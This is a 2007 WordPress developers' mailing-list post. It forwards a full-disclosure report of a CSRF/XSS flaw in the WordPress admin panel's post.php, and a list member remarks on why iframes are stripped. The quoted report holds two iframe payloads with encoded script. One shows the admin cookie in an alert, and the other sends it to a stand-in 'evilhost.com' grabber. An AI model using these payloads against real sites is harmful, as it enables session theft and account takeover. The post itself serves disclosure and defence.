[wp-hackers] FW: [Full-disclosure] WordPress AdminPanel CSRF/XSS
- 0day
Dr. Mike Wendell
theapparatus at gmail.com
Tue Feb 27 14:13:12 GMT 2007
*chuckle* And folks wonder why iframes get stripped out in wpmu and wp.com.
On 2/26/07, Ross M. W. Bennetts <ross.bennetts at une.edu.au> wrote:
> Exploit:
>
> Cookie in an Alert Box:
> <iframe width=600 height=400
> src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript
> %3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe>
>
> Cookie send to an Evil Host:
> <iframe width=600 height=400
> src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript
> %3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/
> datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></ifra
> me>
--
Blog: http://drmikessteakdinner.com
Kim Possible: Remixed: http://kimpossibleremixed.com
Get your own free hosted WordPress Blog today: http://daria.be
More information about the wp-hackers
mailing list